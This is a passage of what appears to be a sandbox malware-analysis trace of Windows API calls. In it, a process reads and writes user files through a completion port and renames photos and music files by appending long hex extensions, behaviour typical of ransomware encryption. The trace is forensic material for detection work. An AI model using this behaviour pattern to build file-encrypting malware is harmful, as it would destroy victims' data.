lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.848] RtlInterlockedCompareExchange64 () returned 0x0 [0166.848] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0167.852] ReadFile (in: hFile=0x5b8, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0167.853] GetQueuedCompletionStatus (in: 
CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.405] ReadFile (in: hFile=0x5a4, lpBuffer=0x76282d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76081a0 | out: lpBuffer=0x76282d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76081a0) returned 1 [0168.405] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.425] WriteFile (in: hFile=0x5b8, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0168.432] RtlInterlockedCompareExchange64 () returned 0xffffffff [0168.432] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.433] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x744a270, ReturnLength=0x73dfc54) returned 0x0 [0168.434] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3", lpString2=".68EA0A18FB25B6664E23CD0B38D43DF2C5584A09ADFA146DE05AF3CFEB99CE52" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3.68EA0A18FB25B6664E23CD0B38D43DF2C5584A09ADFA146DE05AF3CFEB99CE52") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\Zn 
pdo0h3pIYzQ.mp3.68EA0A18FB25B6664E23CD0B38D43DF2C5584A09ADFA146DE05AF3CFEB99CE52" [0168.434] GetProcessHeap () returned 0x270000 [0168.434] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x116) returned 0x43341b0 [0168.434] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x73dfc44, FileInformation=0x43341b0, Length=0x116, FileInformationClass=0xa) returned 0x0 [0168.437] CloseHandle (hObject=0x598) returned 1 [0168.438] GetProcessHeap () returned 0x270000 [0168.439] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0168.441] RtlInterlockedCompareExchange64 () returned 0x0 [0168.441] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.619] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76900b8, ReturnLength=0x73dfc54) returned 0x0 [0168.620] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif", lpString2=".02D71D8E03D4DDB66B51F5B36D86A3B5F61B9C22A34FB43ADFB7DEED5220336C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif.02D71D8E03D4DDB66B51F5B36D86A3B5F61B9C22A34FB43ADFB7DEED5220336C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif.02D71D8E03D4DDB66B51F5B36D86A3B5F61B9C22A34FB43ADFB7DEED5220336C" [0168.620] GetProcessHeap () returned 0x270000 [0168.620] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x7418598 [0168.621] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x73dfc44, FileInformation=0x7418598, Length=0x140, FileInformationClass=0xa) 
returned 0x0 [0168.622] CloseHandle (hObject=0x5b8) returned 1 [0168.624] GetProcessHeap () returned 0x270000 [0168.626] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0168.632] RtlInterlockedCompareExchange64 () returned 0x1 [0168.632] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.642] WriteFile (in: hFile=0x5a4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0168.643] RtlInterlockedCompareExchange64 () returned 0x0 [0168.643] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.652] WriteFile (in: hFile=0x5a4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0168.653] RtlInterlockedCompareExchange64 () returned 0x0 [0168.653] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.664] WriteFile (in: hFile=0x5a4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0168.665] RtlInterlockedCompareExchange64 () returned 
0x0 [0168.665] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.677] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x73e00f8, ReturnLength=0x73dfc54) returned 0x0 [0168.678] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif", lpString2=".A3C0F467F1D459D475E1803A44992ACBEA363B623D3ACFA76EDD1B8F35B6CA5A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif.A3C0F467F1D459D475E1803A44992ACBEA363B623D3ACFA76EDD1B8F35B6CA5A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\xYveXQ2BXsCwy5N1dYs.gif.A3C0F467F1D459D475E1803A44992ACBEA363B623D3ACFA76EDD1B8F35B6CA5A" [0168.678] GetProcessHeap () returned 0x270000 [0168.678] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16c) returned 0x750a2d8 [0168.679] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x73dfc44, FileInformation=0x750a2d8, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0168.681] CloseHandle (hObject=0x5a4) returned 1 [0168.681] GetProcessHeap () returned 0x270000 [0168.682] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0168.682] RtlInterlockedCompareExchange64 () returned 0x1 [0168.682] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 
[0168.690] ReadFile (in: hFile=0x5b8, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x6600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0168.690] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.693] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76900b8, ReturnLength=0x73dfc54) returned 0x0 [0168.694] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg", lpString2=".380BC593EFE5E29C694B3932AC4EE9BDD6CFD6A7294AD7C0F372CE73E0B9D348" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg.380BC593EFE5E29C694B3932AC4EE9BDD6CFD6A7294AD7C0F372CE73E0B9D348") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\nOmtcrLUjyQ.jpg.380BC593EFE5E29C694B3932AC4EE9BDD6CFD6A7294AD7C0F372CE73E0B9D348" [0168.694] GetProcessHeap () returned 0x270000 [0168.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x148) returned 0x4258010 [0168.695] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x73dfc44, FileInformation=0x4258010, Length=0x148, FileInformationClass=0xa) returned 0x0 [0168.698] CloseHandle (hObject=0x5b8) returned 1 [0168.699] GetProcessHeap () returned 0x270000 [0168.700] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0168.700] RtlInterlockedCompareExchange64 () returned 0x1 [0168.700] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, 
lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.704] ReadFile (in: hFile=0x5b8, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0168.704] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.706] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76900b8, ReturnLength=0x73dfc54) returned 0x0 [0168.707] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg", lpString2=".1A6652A39428A465BA3A771C08C911B8C7B4BD0160AF8DCCCAE6ABAEA7681D0F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg.1A6652A39428A465BA3A771C08C911B8C7B4BD0160AF8DCCCAE6ABAEA7681D0F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg.1A6652A39428A465BA3A771C08C911B8C7B4BD0160AF8DCCCAE6ABAEA7681D0F" [0168.707] GetProcessHeap () returned 0x270000 [0168.707] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x14e) returned 0x42fbdd8 [0168.707] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x73dfc44, FileInformation=0x42fbdd8, Length=0x14e, FileInformationClass=0xa) returned 0x0 [0168.725] CloseHandle (hObject=0x5b8) returned 1 [0168.726] GetProcessHeap () returned 0x270000 [0168.727] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0168.727] 
RtlInterlockedCompareExchange64 () returned 0x1 [0168.727] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.730] ReadFile (in: hFile=0x5b8, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0168.731] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0168.731] WriteFile (in: hFile=0x5b8, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0168.736] RtlInterlockedCompareExchange64 () returned 0x0 [0168.736] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.030] ReadFile (in: hFile=0x598, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0169.030] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.031] WriteFile (in: hFile=0x5a8, lpBuffer=0x75526e0*, 
nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75325a8 | out: lpBuffer=0x75526e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75325a8) returned 1 [0169.036] RtlInterlockedCompareExchange64 () returned 0x0 [0169.036] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.036] WriteFile (in: hFile=0x5c4, lpBuffer=0x757a838*, nNumberOfBytesToWrite=0x7000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a700 | out: lpBuffer=0x757a838*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a700) returned 1 [0169.038] RtlInterlockedCompareExchange64 () returned 0x1 [0169.038] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.039] WriteFile (in: hFile=0x5c8, lpBuffer=0x76d9030*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8) returned 1 [0169.041] RtlInterlockedCompareExchange64 () returned 0x2 [0169.041] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.042] WriteFile (in: hFile=0x5d0, lpBuffer=0x7701188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050) returned 1 [0169.043] RtlInterlockedCompareExchange64 () returned 0x3 [0169.044] GetQueuedCompletionStatus 
(in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.044] WriteFile (in: hFile=0x5d4, lpBuffer=0x77292e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8) returned 1 [0169.047] RtlInterlockedCompareExchange64 () returned 0x4 [0169.047] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.048] WriteFile (in: hFile=0x5ac, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0169.050] RtlInterlockedCompareExchange64 () returned 0x5 [0169.050] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.050] WriteFile (in: hFile=0x4a8, lpBuffer=0x76292e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76091a8 | out: lpBuffer=0x76292e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76091a8) returned 1 [0169.051] RtlInterlockedCompareExchange64 () returned 0x6 [0169.051] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.051] 
WriteFile (in: hFile=0x5e4, lpBuffer=0x7651438*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7631300 | out: lpBuffer=0x7651438*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7631300) returned 1 [0169.053] RtlInterlockedCompareExchange64 () returned 0x7 [0169.053] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.053] WriteFile (in: hFile=0x5dc, lpBuffer=0x7679590*, nNumberOfBytesToWrite=0x7000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7659458 | out: lpBuffer=0x7679590*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7659458) returned 1 [0169.054] RtlInterlockedCompareExchange64 () returned 0x8 [0169.054] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.055] WriteFile (in: hFile=0x5e0, lpBuffer=0x77a1298*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7781160 | out: lpBuffer=0x77a1298*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7781160) returned 1 [0169.058] RtlInterlockedCompareExchange64 () returned 0x9 [0169.058] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.058] WriteFile (in: hFile=0x304, lpBuffer=0x77c93f0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77a92b8 | out: lpBuffer=0x77c93f0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77a92b8) returned 1 [0169.060] RtlInterlockedCompareExchange64 () 
returned 0xa [0169.060] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.060] WriteFile (in: hFile=0x5c0, lpBuffer=0x77f1548*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77d1410 | out: lpBuffer=0x77f1548*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77d1410) returned 1 [0169.062] RtlInterlockedCompareExchange64 () returned 0xb [0169.062] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.062] WriteFile (in: hFile=0x5bc, lpBuffer=0x78196a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77f9568 | out: lpBuffer=0x78196a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77f9568) returned 1 [0169.064] RtlInterlockedCompareExchange64 () returned 0xc [0169.064] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.065] WriteFile (in: hFile=0x5e8, lpBuffer=0x78417f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78216c0 | out: lpBuffer=0x78417f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78216c0) returned 1 [0169.066] RtlInterlockedCompareExchange64 () returned 0xd [0169.067] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, 
lpOverlapped=0x73dfc58) returned 1 [0169.067] WriteFile (in: hFile=0x5ec, lpBuffer=0x7869950*, nNumberOfBytesToWrite=0x3800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7849818 | out: lpBuffer=0x7869950*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7849818) returned 1 [0169.068] RtlInterlockedCompareExchange64 () returned 0xe [0169.068] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.069] WriteFile (in: hFile=0x5f0, lpBuffer=0x7891aa8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7871970 | out: lpBuffer=0x7891aa8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7871970) returned 1 [0169.071] RtlInterlockedCompareExchange64 () returned 0xf [0169.071] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.071] WriteFile (in: hFile=0x5f4, lpBuffer=0x78b9c00*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7899ac8 | out: lpBuffer=0x78b9c00*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7899ac8) returned 1 [0169.073] RtlInterlockedCompareExchange64 () returned 0x10 [0169.073] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.073] WriteFile (in: 